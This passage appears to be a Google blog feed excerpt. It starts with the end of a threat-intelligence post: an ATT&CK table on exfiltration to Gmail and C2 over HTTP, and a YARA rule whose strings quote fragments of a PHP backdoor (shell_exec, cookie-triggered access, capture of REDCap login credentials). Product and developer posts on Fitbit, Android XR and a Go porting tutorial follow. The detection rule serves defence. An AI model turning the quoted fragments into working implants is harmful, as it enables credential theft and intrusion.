&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Exfiltration&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1567&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Exfiltration Over Web Service&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Silently forwarding sensitive data to actor-controlled Gmail addresses.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt; &lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1071.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Application Layer Protocol: Web Protocols&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;HTTP response to C2 commands&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Detections&lt;/h3&gt;
&lt;h4&gt;YARA Rules&lt;/h4&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Backdoor_INFINITERED_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$magic_flag = "ej671a16i7fd8202nu6ltfg5p6x7u"
		$magic_flag_base64 = "ej671a16i7fd8202nu6ltfg5p6x7u" base64
		$marker = "b49e334d-9c01-463e-9bc5-00a6920fb66e"
		$marker_base64 = "YjQ5ZTMzNGQtOWMwMS00NjNlLTliYzUtMDBhNjkyMGZiNjZl"
		$s1 = "substr($cookieValue, strlen($magic_flag));"
		$s2 = "getcwd(), php_uname(), phpversion(), $_SERVER['SERVER_SOFTWARE']"
		$s3 = "'data' =&amp;gt; encrypt($data, $key)"
		$s4 = "$data = shell_exec($command);"
		$s5 = "move_uploaded_file($tmpPath, $fileName)"
		$s6 = "$data = implode('|', $fields)"
		$b_s1 = "substr($cookieValue, strlen($magic_flag));" base64
		$b_s2 = "getcwd(), php_uname(), phpversion(), $_SERVER['SERVER_SOFTWARE']" base64
		$b_s3 = "'data' =&amp;gt; encrypt($data, $key)" base64
		$b_s4 = "$data = shell_exec($command);" base64
		$b_s5 = "move_uploaded_file($tmpPath, $fileName)" base64
		$b_s6 = "$data = implode('|', $fields)" base64
		$t1 = "(isset($_POST['username']) &amp;amp;&amp;amp; $_POST['password'])"
		$t2 = "INSERT INTO redcap_sessions (session_id, session_data, session_expiration) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))"
		$t3 = "encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);"
		$t4 = "redcap_connect.php"
		$b_t1 = "(isset($_POST['username']) &amp;amp;&amp;amp; $_POST['password'])" base64
		$b_t2 = "INSERT INTO redcap_sessions (session_id, session_data, session_expiration) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))" base64
		$b_t3 = "encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);" base64
		$b_t4 = "redcap_connect.php" base64
		$u1 = "$zip-&amp;gt;open($filename) === TRUE)"
		$u2 = "$hooks_encode ="
		$u3 = "$auth_encode ="
		$u4 = "$file_content_hooks = $zip-&amp;gt;getFromName($file_hooks);"
		$u5 = "$file_content_auth = $zip-&amp;gt;getFromName($file_auth);"
		$u6 = "$file_content_upgrade = $zip-&amp;gt;getFromName($file_upgrade);"
		$u7 = "str_replace($search_content, $hooks_decode, $file_content_hooks);"
		$u8 = "str_replace($search_content, $upgrade_decode, $file_content_upgrade);"
		$u9 = "str_replace($search_content, $auth_decode, $file_content_auth);"
		$b_u1 = "$zip-&amp;gt;open($filename) === TRUE)" base64
		$b_u2 = "$hooks_encode =" base64
		$b_u3 = "$auth_encode =" base64
		$b_u4 = "$file_content_hooks = $zip-&amp;gt;getFromName($file_hooks);" base64
		$b_u5 = "$file_content_auth = $zip-&amp;gt;getFromName($file_auth);" base64
		$b_u6 = "$file_content_upgrade = $zip-&amp;gt;getFromName($file_upgrade);" base64
		$b_u7 = "str_replace($search_content, $hooks_decode, $file_content_hooks);" base64
		$b_u8 = "str_replace($search_content, $upgrade_decode, $file_content_upgrade);" base64
		$b_u9 = "str_replace($search_content, $auth_decode, $file_content_auth);" base64
		$filemarker = "&amp;lt;?php"
	condition:
		filesize &amp;lt; 1MB and $filemarker in (0 .. 128) and (((any of ($magic*) or any of ($marker*)) and (any of ($s*) or any of ($t*) or any of ($u*))) or 4 of ($s*) or 4 of ($b_s*) or all of ($t*) or all of ($b_t*) or 6 of ($u*) or 6 of ($b_u*))
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/threat-intelligence/prc-targets-us-medical-research/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-15T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/devices/fitbit/buy-fitbit-air-pre-tax-health-savings/</id>
    <title>Google Fitbit Air is now HSA/FSA eligible in the U.S.</title>
    <updated>2026-06-15T13:00:00+00:00</updated>
    <content type="html">U.S. customers can use pre-tax HSA and FSA funds to buy the Google Fitbit Air to monitor daily health and wellness routines.</content>
    <link href="https://blog.google/products-and-platforms/devices/fitbit/buy-fitbit-air-pre-tax-health-savings/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-15T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://android-developers.googleblog.com/2026/06/what-is-new-android-xr.html</id>
    <title>What’s New in Android XR: Tooling, Engine Support, and Ecosystem Updates</title>
    <updated>2026-06-15T13:00:00+00:00</updated>
    <content type="html">&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidQbbHgqIKeG9iWQhqVvgynFo-jYOW9LQGLPtex5qJWYlEU9P42f4yN1ifgf6WNCvQtyz2Se26zJcYOmaLWgDKSq93U2VvBKg-GqfuFXjYlIZel7_sA0tB_ttwyfH224iVx7pKphCAS2WTkURV-YlkawjCM4vCyilKyW8JE9oB7ZYHwIk4nZ9zy2QRtlg/s4097/MM_AndroidXR_Meta.png" style="display: none;" /&gt;&lt;div&gt;&lt;i&gt;Posted by Stevan Silva, Group Product Manager, and Vinny DaSilva, Developer Relations Engineer, Android XR&lt;/i&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXvO844njMUrdLVdVR7OsiOYpKi-DRYXYjfKxG03d5UXHoFJ6PT5EUP7cK9Ut5VwPfRzk6igYao1jPfsnsSS_Fjx03c30gMMVZ2alKLojniy15PQl-iprbXcRCnlYMjyCigBEXB15NIrbLVyHVp8DcNmuBfs_R8VPnG_H3GEnq91PP-e4RKd-dtdUEpGU/s8419/MM_AndroidXR_Blog%20(1).png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXvO844njMUrdLVdVR7OsiOYpKi-DRYXYjfKxG03d5UXHoFJ6PT5EUP7cK9Ut5VwPfRzk6igYao1jPfsnsSS_Fjx03c30gMMVZ2alKLojniy15PQl-iprbXcRCnlYMjyCigBEXB15NIrbLVyHVp8DcNmuBfs_R8VPnG_H3GEnq91PP-e4RKd-dtdUEpGU/s16000/MM_AndroidXR_Blog%20(1).png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;From augmented overlays to fully immersive environments, the Android XR ecosystem is expanding rapidly, with the Samsung Galaxy XR already available today. Alongside the latest updates from &lt;a href="https://developer.android.com/blog/posts/updates-to-the-android-xr-sdk-introducing-developer-preview-4"&gt;Google I/O&lt;/a&gt; and this week's Augmented World Expo (AWE), we are rolling out new tooling, broader engine support, and ecosystem resources to help you build and scale experiences for Android XR.&lt;/p&gt;

&lt;p&gt;To get a quick look at what’s new, check out our video recap!&lt;/p&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
  
&lt;/div&gt;


&lt;p&gt;Ready to dive deeper? Let’s jump into the major updates that will streamline your XR development workflow.&lt;/p&gt;

&lt;h2&gt;Build, Prototype, and Iterate with Developer Preview 4&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://developer.android.com/blog/posts/updates-to-the-android-xr-sdk-introducing-developer-preview-4"&gt;Developer Preview 4 of the Android XR SDK&lt;/a&gt; delivers the APIs and tools you need to design and build right from your laptop. This update includes the specific libraries required to target both immersive and augmented experiences. Check out the video below for a comprehensive breakdown of the latest in Android XR:&lt;/p&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;To test all of these interactions without needing physical hardware, you can emulate  and iterate on your code entirely within &lt;a href="https://developer.android.com/studio/preview"&gt;Android Studio&lt;/a&gt;. Check out our tooling deep dive to see how you can use XR emulator today:&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;


&lt;h2 style="text-align: left;"&gt;Extending your mobile apps for intelligent eyewear&lt;/h2&gt;

&lt;p style="text-align: left;"&gt;Building for audio and display glasses doesn't mean starting from scratch. With the &lt;a href="https://developer.android.com/develop/xr/jetpack-xr-sdk#jetpack-projected"&gt;Jetpack Projected library&lt;/a&gt;, you can take your existing mobile app to create a complementary augmented experience. The new release includes a &lt;a href="https://developer.android.com/develop/xr/jetpack-xr-sdk/glasses/check-availability"&gt;Device Availability API&lt;/a&gt; that hooks into standard Android Lifecycle states, allowing your app to natively adapt its behavior based on whether the glasses are being worn.&lt;/p&gt;

&lt;p style="text-align: left;"&gt;To accelerate your development journey, use &lt;a href="https://developer.android.com/tools/agents"&gt;Android CLI&lt;/a&gt; and the &lt;a href="https://github.com/android/skills"&gt;display glasses skill&lt;/a&gt; to extend your mobile app into an augmented experience. The skill is packed with specialized knowledge of Jetpack Compose Glimmer, enabling it to build your UI using our recommended design patterns.&lt;/p&gt;

&lt;p style="text-align: left;"&gt;We’ve also updated &lt;a href="https://developer.android.com/develop/xr/jetpack-xr-sdk/jetpack-compose-glimmer"&gt;Jetpack Compose Glimmer&lt;/a&gt; to optimize text legibility on optical see-through displays and provide touchpad-optimized navigation components.&lt;/p&gt;

&lt;p style="text-align: left;"&gt;See how it looks in action: Developers at &lt;a href="https://play.google.com/store/apps/details?id=com.naver.labs.translator"&gt;NAVER Papago&lt;/a&gt; are already exploring how to seamlessly bring their mobile experience directly to display glasses.&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;



&lt;p style="text-align: left;"&gt;To learn how to leverage these tools, watch this session on extending mobile apps for AI glasses:&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;

&lt;h3 style="text-align: left;"&gt;Building global, location-based immersive experiences&lt;/h3&gt;

&lt;p style="text-align: left;"&gt;For developers focused on immersive experiences, Developer Preview 4 brings modern, Kotlin-first architectural upgrades across our core perception libraries. We have also introduced an early preview of the Geospatial API for wired XR glasses. By combining &lt;a href="https://developer.android.com/develop/xr/jetpack-xr-sdk/arcore"&gt;ARCore for Jetpack XR&lt;/a&gt; with Google's Visual Positioning System (VPS), you can anchor digital content to high-precision real-world locations.&lt;/p&gt;

&lt;h3 style="text-align: left;"&gt;Leverage the Platforms You Know with Expanded Engine Support&lt;/h3&gt;

&lt;p style="text-align: left;"&gt;We want you to build using the ecosystems and workflows you already know best. To make it easier to bring your existing XR experiences over to Android XR, we are thrilled to introduce &lt;a href="https://developer.android.com/blog/posts/android-xr-updates-for-unity-unreal-and-godot"&gt;official support for Unreal Engine and Godot&lt;/a&gt; alongside our &lt;a href="https://unity.com/blog/unity-android-xr-wired-glasses-support"&gt;Unity's support for wired glasses&lt;/a&gt;.&lt;/p&gt;

&lt;p style="text-align: left;"&gt;With this expansion, we are introducing the &lt;a href="https://developer.android.com/develop/xr/engine-hub"&gt;Android XR Engine Hub&lt;/a&gt;, a desktop tool for Windows that shortens iteration cycles by bringing real-time testing directly into your engines viewport. Catch the full breakdown of our engine updates here:&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;


&lt;h3 style="text-align: left;"&gt;Apply Today for the Android XR Developer Catalyst Program&lt;/h3&gt;

&lt;p style="text-align: left;"&gt;In addition to providing the platform, we want to fuel your innovation directly through ecosystem resources. The &lt;a href="https://developer.android.com/develop/xr/engine-hub"&gt;Android XR Developer Catalyst Program&lt;/a&gt; is designed to support developers with access to pre-release hardware, including display glasses, and wired XR glasses.&lt;/p&gt;

&lt;p style="text-align: left;"&gt;Accepted developers will receive resources, support forums, and launch guidance to prepare their apps for Google Play. Applications are open right now, so don't wait to &lt;a href="https://developer.android.com/develop/xr/catalyst"&gt;submit your project ideas&lt;/a&gt;.&lt;/p&gt;

&lt;h3 style="text-align: left;"&gt;Start Building!&lt;/h3&gt;

&lt;p style="text-align: left;"&gt;The ecosystem is growing rapidly, and the tools are ready for you to explore. Samsung Galaxy XR is available now, and you can dive in today with &lt;a href="https://developer.android.com/blog/posts/updates-to-the-android-xr-sdk-introducing-developer-preview-4"&gt;Developer Preview 4 of the Android XR SDK&lt;/a&gt;. If you don’t have hardware yet, check out the tools and to get started with the &lt;a href="http://google.com/url?sa=j&amp;amp;url=http%3A%2F%2Fgoo.gle%2Fxr-setup&amp;amp;uct=1765473974&amp;amp;usg=L4MkW244XAfYytuJciS39GjuDv0.&amp;amp;opi=73833047&amp;amp;source=chat"&gt;XR Emulator in Android Studio&lt;/a&gt;.&lt;/p&gt;

&lt;p style="text-align: left;"&gt;For a complete look at all of our technical sessions, browse the full &lt;a href="https://youtube.com/playlist?list=PLWz5rJ2EKKc-feGl0F3rXtUste_8TkvZJ&amp;amp;si=zggz4T3eiQmH5xL2"&gt;Android XR Playlist on YouTube&lt;/a&gt; to see what else is possible. We can’t wait to see what you build!&lt;/p&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content>
    <link href="https://android-developers.googleblog.com/2026/06/what-is-new-android-xr.html" rel="alternate"/>
    <category term="Android Developers"/>
    <published>2026-06-15T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/how-i-learned-go-in-a-day-with-antigravity-20-and-how-you-can-do-the-same/</id>
    <title>How I learned Go in a Day with Antigravity 2.0 and How You Can Do the Same</title>
    <updated>2026-06-15T09:29:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;I have been exploring how&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; to reclaim my software stack from NPM dependency overhead and replace my resource-intensive Node.js runtime with a compiled, single-binary Go CLI. The result of my efforts is &lt;/span&gt;&lt;a href="https://github.com/alexastrum/skl" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;skl&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a fast tool we use for managing Agent Skills, that launches in 2ms and uses only 11MB of memory.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;But how exactly did I do it?&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Simply, I set the architectural goals and audited the logic, while Antigravity handled the mechanical work of code translation, test generation, and platform path mappings for us. This post describes the step-by-step walkthrough of our migration workflow to help you build yours.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Step 0: Seed personal learning goals&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before writing any code, you start by defining the boundaries of your project. In our case, I wanted a zero-dependency core that used minimal external packages. I decided that our CLI tool needs to be fast, and our security model had to be zero-trust wherever appropriate. In the process, my agent added specific constraints: sanitizing all of our inputs, blocking path traversals, and enforcing depth limits on our folder scans to prevent CPU hangs.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;I began by prompting Gemini to audit alternative stacks and help us weigh their tradeoffs.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;Research online and identify 3-5 CLI tool building alternatives to use over TS and explain why (focus on performance and security) with specific example and links&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be76ba220&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here are some alternatives we considered:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Rust&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; was exceptionally performant, but navigating its borrow checker rules and managing its lifetime annotations added too much friction for our simple symlinking tool.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you choose &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Python&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, you will have to distribute a runtime interpreter and manage virtual environments, dragging in packaging overhead via &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;pip&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; that we wanted to avoid.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Zig&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; offered excellent low-level memory controls and compiling speed, but it lacked high-level standard library abstractions for HTTP operations and archive extraction out of the box.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Compiled &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Swift&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; provided clean scripting on macOS, but its cross-platform compilation capabilities for Windows and Linux were less suited for our multi-platform requirements.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For us, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Go&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; struck the right balance: it gave us synchronous, linear code, instant compiling, and a rich standard library.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To ensure I was not doing the same work that someone had already completed before me, I kicked off the project by asking directly:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;I want to port the `npx skills` to go. Did anyone do this before?&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be76ba1c0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The agent researched the web and verified that there was no official Go port of the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;vercel-labs/skills&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; repository. It confirmed that while the official CLI is TypeScript-based and distributed via &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;npm&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, the Agent Skills specification itself is open and language-agnostic. This meant we were free to build a compiled Go port from scratch.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;And since I want to learn in the process, I also asked for Go-specific tips, tricks, and traps:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;Identify 3-5 patterns on how to / how NOT to use GO and explain them to me&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be76ba940&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Step 1: It's about Skills&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To make best use of best practices in a language that I'm not familiar with, I decided to find the most popular, well-received Agent Skill (instructions that guide AI coding assistants) and install it before we write any code or even start planning. Grounding the environment first ensures that any code written or planned subsequently conforms to the community's consensus style.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Skill search prompt&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;I asked the agent what community agent skills were available for Go:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;what are the top community agent skills for `go`?&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be76baee0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once the agent suggested &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;samber/cc-skills-golang&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, I directed it to install the skill pack:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;add all skills from samber/cc-skills-golang&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be76bad60&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once installed, I manually verified that the skill was discovered and ready by typing &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/golang-&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to invoke autocompletion.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Step 2: Gap analysis and planning&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;I initialized the architectural goals by providing the agent with the following instruction:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;Plan 100% functionality port of `npx skills` to Go, focusing on safety, best practices, and with 90% unit test coverage. Pull the repo and map things out. Ask me any questions.&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be76ba0d0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our first topic task was the dynamic onboarding flow. When asked what the default should be, I suggested prompting to install &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;antigravity-cli&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; if no agent is found. I also defined the fallback behavior to the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;universal&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; directory when multiple active agents are detected:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;For the MVP, we target Antigravity 2 support as default and fallback to universal through the standards-compliant &amp;#x27;.agents&amp;#x27; directory (if multiple agents detected).&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be76ba4f0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Implementation&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;After I approved the Plan, Antigravity handled the systematic conversion of all 51+ agent configuration records (even though I didn't explicitly ask for all this, the AI correctly identified the task as simple enough to just include in the MVP scope), mapping distinct directories for Aider, Claude Code, Cursor, Zed, and others from TypeScript to Go, ensuring we fully covered all environments.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The core structures are conveniently located in one file &lt;/span&gt;&lt;a href="https://github.com/alexastrum/skl/blob/main/src/skl/types.go" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;types.go&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;type AgentType string\r\n\r\ntype AgentConfig struct {\r\n\tName                string\r\n\tDisplayName         string\r\n\tSkillsDir           string\r\n\tGlobalSkillsDir     string\r\n\tShowInUniversalList bool\r\n\tDetectInstalled     func(home, configHome, cwd string) bool\r\n}\r\n\r\n...&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be76ba3d0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This mapping works well. For example, the detection logic for Zed handles Linux (Flatpak), macOS, and Windows configurations dynamically in just a few lines:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
